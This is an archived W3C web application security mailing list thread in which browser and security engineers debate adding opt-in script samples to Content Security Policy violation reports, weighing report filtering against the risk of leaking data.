Re: CSP reports: `script-sample` from Mike West on 2017-02-22 (public-webappsec@w3.org from February 2017)

From: Mike West <mkwst@google.com>
Date: Wed, 22 Feb 2017 15:23:29 +0100
To: Neil Matatall <oreoshake@github.com>
Cc: Artur Janc <aaj@google.com>, Brad Hill <hillbrad@gmail.com>, Craig Francis <craig.francis@gmail.com>, Krzysztof Kotowicz <kkotowicz@gmail.com>, Devdatta Akhawe <dev.akhawe@gmail.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Christoph Kerschbaumer <ckerschbaumer@mozilla.com>, Frederik Braun <fbraun@mozilla.com>, Scott Helme <scotthelme@hotmail.com>, Lukas Weichselbaum <lwe@google.com>, Michele Spagnuolo <mikispag@google.com>, Jochen Eisinger <eisinger@google.com>
Message-ID: <CAKXHy=eA80TQk7bFtyOrz5Gw2cbF34OzCfaEZOxZ=tAT2UHvRA@mail.gmail.com>
I'd suggest that interested folks comment on
https://github.com/w3c/webappsec-csp/issues/119. I've added a strawman to
the spec which allows a policy to opt-in to delivering a `sample` attribute
for inline violations iff a `'report-sample'` expression is present in the
relevant `script-src` or `style-src` directive.

Feedback welcome.

-mike

On Tue, Feb 21, 2017 at 8:39 PM, Neil Matatall <oreoshake@github.com> wrote:

> :wave: hello again friends,
>
> I've been snoozing this thread for almost 6 months and I'd like to
> resurrect this conversation after a recent twitter flurry of action and +1s
> (https://twitter.com/mikewest/status/834081437473185792). I don't think
> anyone has called out _why_ we need this other than "moar data" but I think
> it's important to think about two use cases: report filtering and actually
> capturing attack payloads. 5 years ago (https://lists.w3.org/
> Archives/Public/public-webappsec/2012Dec/0012.html) I thought
> script-sample was for capturing attack payloads. Today, I think
> script-sample is more important for report filtering.
>
> 2.5 years ago the topic of "inline and eval reports look the same" was
> discussed (https://github.com/w3c/webappsec/issues/52). This is a serious
> problem for analyzing reports.
>
> .... slight tangent on why filtering is so important
>
> CSP reporting without script-sample is not very useful for filtering
> garbage from plugins. Having script-sample data from firefox has been the
> basis of filtering garbage. Without this data, we cannot filter that
> specific type of garbage. Filtering out garbage is critical for building
> the case for going from report-only to enforce mode. This logic is spread
> out across the internet, e.g. https://oreoshake.github.io/
> csp/twitter/2014/07/25/twitters-csp-report-collector-design.html,
> https://blogs.dropbox.com/tech/2015/09/on-csp-reporting-and-filtering/,
> etc. Funny enough, superfish.com was a standard "un-actionable report"
> filter that has been passed down :) For every blog post on CSP reporting,
> the conversation always devolves to one thing: how are you filtering
> reports (https://mathiasbynens.be/notes/csp-reports). For every CSP
> reporting collector, filtering is reimplemented ( https://github.com/
> jacobbednarz/go-csp-collector/blob/master/csp_collector.go#L58  and
> https://github.com/nico3333fr/CSP-useful/blob/
> 61106b31683928a0f3dde3d312eaa257d0740914/report-uri/csp-
> parser-enhanced.php#L17 ). Sentry even added CSP report collection, and
> guess what, they also do filtering https://github.com/
> getsentry/sentry/commit/0b9e124b702183a70002635ffd252e27d11fbe97 .
>
> Scott Helme says he filters out 64% of his reports (though this number
> includes things that are not csp reports). That's about what I can recall
> from days where I had to collect reports. With script-sample from all
> browsers, I suspect that number will jump up significantly since it will be
> easier to identify plugins/other garbage.
>
> ... my point is
>
> Most people implementing CSP expect the reports to be useful. Alas, they
> are not without some serious filtering. Many are turned away by the high
> quantity of "un-actionable" reports. While I'd be super happy if browser
> vendors came up with magic to make filtering obsolete (all have acknowledge
> plugin noise is a bug), I'd be happier if we could just do better filtering
> today. Script sample helps me accomplish better filtering.
>
> ... but
>
> Data leakage. This is not to be taken lightly. I think everything that can
> be said about this already has. I also anecdotally agree that we're more
> likely to leak something in an URL than in a script sample. The scripts
> samples were crucial to filtering out lastpass violations which were easily
> identifiable. Adding an opt-in flag while keeping the 40 character limit
> would be great. Requiring TLD+1 matching would also be acceptable in my
> mind.
>
> JSONP. Ugh. It's still pretty widespread and it's unfortunate that the
> internet is still terrible. I'm all for not breaking the web, but I'm more
> for not being held back.
>
>
>
>
>
>
>
> On Wed, Oct 19, 2016 at 9:49 AM Artur Janc <aaj@google.com> wrote:
>
>> On Wed, Oct 19, 2016 at 7:14 PM, Brad Hill <hillbrad@gmail.com> wrote:
>>
>> Just to add my comment after discussion on today's teleconference:
>>
>> I'm sympathetic to the argument that "you must trust your reporting
>> endpoint" for inline scripts and event handlers.
>>
>> I'm concerned about it for non-same origin external scripts.  There are
>> lots of "guarded" JSONP like endpoints that I imagine have PII in the first
>> 40 chars, e.g., something like the following where u is a userid:
>>
>> for(;;);{u:21482823,  ...
>>
>> Allowing any cross-origin endpoint to request this response and dump it
>> to a reporting endpoint of their choice would be very bad.
>>
>>
>> Yes, totally! What we were talking about earlier is reporting script
>> samples for "inline" script violations such as event handlers and inline
>> <script> blocks -- this is data which the developer can already access by
>> inspecting the DOM (though in some cases it can be difficult if the element
>> has already been removed). The main benefit of having it done by the user
>> agent is robustness and not requiring the developer to load a "CSP
>> debugging" library everywhere on their site.
>>
>> FWIW I'd be strongly opposed to doing this for external scripts because
>> of the problem you're talking about. Luckily, we generally don't need this
>> for external scripts because they can already be identified by the
>> blocked-uri, unlike inline violations.
>>
>>
>> -Brad
>>
>> On Wed, Oct 19, 2016 at 8:21 AM Craig Francis <craig.francis@gmail.com>
>> wrote:
>>
>> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>>
>> URLs should not contain sensitive data, precisely because they are often
>> relayed to third parties
>>
>>
>>
>> Hi Krzysztof,
>>
>> While I agree, the classic example is a password reset.
>>
>> As in, a link is sent to the user via email, and that link contains a
>> sensitive token that allows someone to change the account password.
>>
>> That said, the token should not last long to deduce the risk of it being
>> exposed to 3rd parties (e.g. expiring it after use, or a certain period of
>> time).
>>
>> Craig
>>
>>
>>
>>
>>
>>
>> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>>
>>
>>
>> 2016-10-19 2:16 GMT+02:00 Artur Janc <aaj@google.com>:
>>
>> On Tue, Oct 18, 2016 at 10:05 AM, Mike West <mkwst@google.com> wrote:
>>
>> On Tue, Oct 18, 2016 at 1:03 AM, Artur Janc <aaj@google.com> wrote:
>>
>> On Mon, Oct 17, 2016 at 7:15 PM, Devdatta Akhawe <dev.akhawe@gmail.com>
>> wrote:
>>
>> Hey
>>
>> In the case of a third-party script having an error, what are example
>> leaks you are worried about?
>>
>>
>> The same kinds of issues that lead us to sanitize script errors for
>> things loaded as CORS cross-origin scripts: https://html.spec.
>> whatwg.org/#muted-errors. If the resource hasn't opted-in to being
>> same-origin with you, script errors leak data you wouldn't otherwise have
>> access to.
>>
>>
>> Thanks for the summary, Mike! It's a good overview of the issue, but I'd
>> like to expand on the reasoning for why including the prefix of an inline
>> script doesn't sound particularly scary to me.
>>
>>
>> Thanks for fleshing out the counterpoints, Artur!
>>
>>
>> Basically, in order for this to be a concern, all of the following
>> conditions need to be met:
>>
>> 1. The application has to use untrusted report collection infrastructure.
>> If that is the case, the application is already leaking sensitive data from
>> page/referrer URLs to its collector.
>>
>>
>> "trusted" to receive URLs doesn't seem to directly equate to "trusted" to
>> store sensitive data. If you're sure that you don't have sensitive data on
>> your pages, great. But you were also presumably "sure" that you didn't have
>> inline script on your pages, right? :)
>>
>>
>> Keep in mind that URLs are sensitive data for most applications and they
>> are currently being sent in violation reports.
>>
>>
>> URLs should not contain sensitive data, precisely because they are often
>> relayed to third parties in e.g. referrer. If they do, that's usually
>> considered a vulnerability by e.g. OWASP, especially if the URL is
>> capability bearing (IDOR
>> <https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References>
>> is even in OWASP Top 10). I agree that some applications disclose sensitive
>> information in URLs, but that's should not be the majority of them. I think
>> that for a lot of applications URLs reported through e.g. CSP violation
>> reports are still subject to regular access control, whereas we just don't
>> know yet if sensitive tokens are not included in script samples. It's
>> likely some IDs are present in the inline scripts <a href=#
>> oncllick=a.select(123)>
>>
>> The password reset example Craig is talking about is a fairly ubiquitous
>> feature which generally needs to pass sensitive data in the URL for
>> compatibility with email clients. Also, capability URLs are a thing in a
>> lot of apps (e.g. Google Docs), and so are various features which reveal
>> the identity of the current user (/profile/koto).
>>
>> But even without direct leaks of PII and SPII, URLs contain a lot of data
>> about the current user, the data they have in the given application, and
>> their interactions with the app. For example, a search engine is likely to
>> disclose your queries, a social network will leak the IDs of your friends
>> and groups you belong to, a mapping site will have your location, and even
>> a news site will disclose the articles you read, which are sensitive in
>> certain contexts.
>>
>> This is difficult to definitively prove, but I'd say that claiming that
>> an application doesn't have any interesting/sensitive data in its URLs
>> would be an exception rather than the norm. But I'm not sure how to
>> convince you other than letting you pick some interesting apps and trying
>> to find interesting stuff in their URLs ;-)
>>
>> Cheers,
>> -A
>>
>>
>>
>>
>> I'm having a difficult time imagining a case where an application is okay
>> with disclosing their URLs to a third-party for the purpose of debugging
>> violation reports, and is not okay with disclosing script prefixes for the
>> same purpose, given that:
>> 1) Almost all applications have sensitive data in URLs, compared to a
>> certainly real, but less specific risk of having inline scripts with
>> sensitive data in its prefix, assuming it's limited to a reasonable length.
>>
>>
>> Citation needed (for the "almost all" claim). I agree the risk of leaking
>> sensitive date might be mitigated by adding a reasonable length limit.
>>
>> 2) URLs are disclosed much more frequently than script samples would be,
>> because they are sent with every report (not just "inline" script-src
>> violations). In the `referrer` field, the UA is also sending a URL of
>> another, unrelated page, increasing the likelihood that sensitive data will
>> appear in the report.
>>
>>
>> Which is why it's a best practice not to have sensitive data in URLs, but
>> instead e.g. using cookies or POST parameters to transfer them.
>>
>>
>> 3) There is no sanitization of URL parameters in violation reports,
>> compared to the prefixing logic we're considering for script samples.
>>
>>
>> In fact, I'd be much more worried about URLs than script prefixes,
>> because URLs leak on *any* violation (not just for script-src) and URLs
>> frequently contain PII or authorization/capability-bearing tokens e.g
>> for password reset functionality.
>>
>>
>> We've talked a bit about URL leakage in https://github.com/w3c/
>> webappsec-csp/issues/111. I recall that Emily was reluctant to apply
>> referrer policy to the page's URL vis a vis the reporting endpoint, but I
>> still think it might make sense.
>>
>>
>> 2. The application needs to have a script which includes sensitive user
>> data somewhere in the first N characters. FWIW in our small-scale analysis
>> of a few hundred thousand reports we saw ~300 inline script samples sent
>> by Firefox (with N=40) and haven't found sensitive tokens in any of the
>> snippets.
>>
>>
>> Yup. I'm reluctant to draw too many conclusions from that data, given the
>> pretty homogeneous character of the sites we're currently applying CSP to
>> at Google, but I agree with your characterization of the data.
>>
>> Scott might have more data from a wider sampling of sites, written by a
>> wider variety of engineering teams (though it's not clear that the terms of
>> that site would allow any analysis of the data).
>>
>>
>> I completely agree, this data is just what we had readily available -- we
>> can certainly do a much larger analysis of script prefixes based on the
>> search index. That said, if we're worried about the script-sample approach,
>> perhaps not seeing any sensitive data in the first dataset we looked at
>> could be a signal that it's worth pursuing further.
>>
>> 3. The offending script needs to cause a CSP violation, i.e. not have a
>> valid nonce, meaning that the application is likely broken if the policy is
>> in enforcing mode.
>>
>>
>> 1. Report mode exists.
>>
>> 2. Embedded enforcement might make it more likely that XSS on a site
>> could cause policy to be inadvertantly applied to itself or its
>> dependencies. We talked about this briefly last week, and I filed
>> https://github.com/w3c/webappsec-csp/issues/126 to ponder it. :)
>>
>>
>> Since CSPs applied by embedded enforcement serve a very different purpose
>> than current policies (they don't try to mitigate script injection), it
>> would very likely be okay to just not include script-sample data for such
>> policies. Also, embedded enforcement is still pretty far off, and the
>> reporting problem is an issue for pretty much every site currently
>> gathering violation reports; we should probably weigh the value of fixing
>> CSP reporting accordingly.
>>
>>
>> As a security engineer, I would consider #1 to be the real security
>> boundary -- a developer should use a CSP collector she trusts because
>> otherwise, even without script-sample, reports contain data that can
>> compromise the application.
>>
>>
>> That sounds like an argument for reducing the amount of data in reports,
>> not for increasing it. I think it's somewhat rational to believe that
>> reporting endpoints are going to have longer retention times and laxer
>> retention policies than application databases. Data leaking from the latter
>> into the former seems like a real risk. I agree that the URL itself already
>> presents risks, but I don't understand how that's a justification for
>> accepting more risk.
>>
>>
>> It is an argument for using trusted infrastructure when building your
>> application ;-) Developers are already accustomed to deciding whether to
>> place trust in various components of their apps, whether it's the hosting
>> platform and OS, server-side modules and libraries, or JS widgets and other
>> embedded resources. A CSP violation endpoint is currently a
>> security-critical part of an application because it receives URLs; people
>> who don't trust their collection infrastructure already have insecure
>> applications and adding script-sample to reports does little to change
>> this. (Note that this wouldn't hold for applications which have nothing
>> sensitive in URLs and embed sensitive data at the beginning of inline
>> scripts, but this doesn't seem like a common pattern.)
>>
>> Basically, the reluctance to include relevant debugging information in
>> the violation report seems to be somewhat of a misplaced concern to me,
>> because it ignores the trust relationship the application owner must
>> already have with their report collection endpoint.
>>
>> Perhaps it's pertinent to take a step back and think about the reason to
>> have reporting functionality in CSP in the first place -- after all, the
>> mechanism could certainly work only via throwing SecurityPolicyViolation
>> events and requiring developers to write their own logging code. The fact
>> that this capability exists in UAs, and is not restricted to sending
>> reports to the same origin or same "base domain" (contrary to the original
>> proposals, e.g. in http://research.sidstamm.com/papers/csp-www2010.pdf)
>> indicates that CSP wants to be flexible and give developers ultimate
>> control over the reporting functionality. Given this design choice, it
>> seems okay to trust the developer to pick the right report URI for their
>> application and include useful debugging data if the developer wants it; in
>> a way, the status quo is the worst of both worlds, because it already
>> requires the developer to fully trust the collector, but doesn't give her
>> enough useful data to track down causes of violations.
>>
>> In case it helps: Lukas ran a quick analysis of the report-uri values
>> we've seen in the wild, and e.g. for the domains with CSP in Alexa 100,000
>> we see the following:
>> - 49% don't set a report-uri
>> - 29% have a report-uri pointing to a relative path (/foo)
>> - 10% have a report-uri pointing to the same origin, with another 1%
>> using a sibling subdomain (foo.example.org reporting to csp.example.org)
>>
>> Out of the remaining ~10% which send violations to external URLs, about
>> half point to report-uri.io and a couple of other logging services, and
>> the rest seems to use another domain owned by the same person/organization,
>> e.g. vine.co sends reports to twitter.com. The data for all domains in
>> our set isn't substantially different (66% without report-uri; 24%
>> reporting to own domain; 10% externally). This data doesn't include all the
>> Google ccTLDs and a couple of other big providers, and I'm sure it's
>> missing some other domains, e.g. ones with CSP in parts of the site
>> requiring authentication, but AFAIK it shouldn't have a systematic bias
>> otherwise.
>>
>> I can easily imagine scripts that violate conditions #2 and #3, but at
>> the same time we have not seen many examples of such scripts so far, nor
>> have people complained about the script-sample data already being included
>> by Firefox (AFAIK).
>>
>>
>> People are generally unlikely to complain about getting more data,
>> especially when the data's helpful and valuable. That can justify pretty
>> much anything, though: lots of people think CORS is pretty restrictive, for
>> instance, and probably wouldn't be sad if we relaxed it in various ways.
>>
>>
>> Overall, I don't see the gathering of script samples as qualitatively
>> different to the collection of URLs. However, if we are indeed particularly
>> worried about script snippets, we could make this opt-in and enable the
>> functionality only in the presence of a new keyword (report-uri /foo
>> 'report-script-samples') and add warnings in the spec to explain the
>> pitfalls. This way even if I'm wrong about all of the above we would not
>> expose any data from existing applications.
>>
>>
>> I suspect that such an option would simply be copy-pased into new
>> policies, but yes, it seems like a reasonable approach.
>>
>>
>> For some background about why we're even talking about this: currently
>> violation reports are all but useless for both debugging and detection of
>> the exploitation of XSS due to the noise generated by browser extensions.
>>
>>
>> I agree that this is a problem that we should solve. One way of solving
>> it is to add data to the reports. Another is to invest more in cleaning up
>> the reports that you get so that there's less noise. I wish browser vendors
>> (including Chrome) spent more time on the latter, as we're actively harming
>> users by not doing so.
>>
>>
>> Yes, fixing the blocking and reporting of extension-injected scripts
>> would certainly help (although note that "less noise" likely isn't
>> sufficient, it really has to be zero noise), but IIRC prior discussions
>> we've had about the topic indicated that this is an almost intractable
>> problem, so it would be great to find alternative solutions.
>>
>> The script sample approach also has several important advantages because
>> even without extension-related false positives, developers would have very
>> little information about the actual cause of inline script violations
>> (which are the majority of possible CSP problems in nonce-based policies).
>> Sending some of the script text not only makes it possible to discard all
>> spurious reports, but also gives the developer the crucial bit of data to
>> find and fix actual site errors; it seems like a workable solution to the
>> current reporting problems faced by many sites.
>>
>> Cheers,
>> -Artur
>>
>>
>>
>>
>> --
>> Best regards,
>> Krzysztof Kotowicz
>>
>>
>>
Received on Wednesday, 22 February 2017 14:24:31 UTC